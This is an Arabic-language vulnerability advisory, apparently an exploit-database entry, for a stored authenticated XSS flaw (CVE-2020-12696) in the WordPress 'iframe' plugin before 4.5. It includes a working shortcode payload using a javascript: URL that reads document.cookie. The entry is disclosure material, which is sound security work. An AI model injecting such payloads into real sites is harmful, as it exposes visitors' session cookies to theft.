
البرمجة النصية عبر المواقع المخزنة - إضافة Iframe - ووردبريس
██╗ ██╗███████╗███████╗
╚██╗██╔╝██╔════╝██╔════╝
╚███╔╝ ███████╗███████╗
██╔██╗ ╚════██║╚════██║
██╔╝ ██╗███████║███████║
╚═╝ ╚═╝╚══════╝╚══════╝
Iframe < 4.5 - ثغرة برمجة نصية عبر المواقع (XSS) مخزنة وموثّقة
لا تقوم إضافة iframe قبل الإصدار 4.5 بتعقيم عنوان URL.
الحمولة: </b>[iframe src="javascript:confirm(document.cookie)" width="100%" height="500"]
إصدار [الإضافة]: </b>4.4
تم الاختبار على: </b>WordPress 5.2.4
الباحث:</b> Guilherme Rubert
المراجع:
https://guilhermerubert.com/blog/cve-2020-12696/
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12696
https://wordpress.org/plugins/iframe/#developers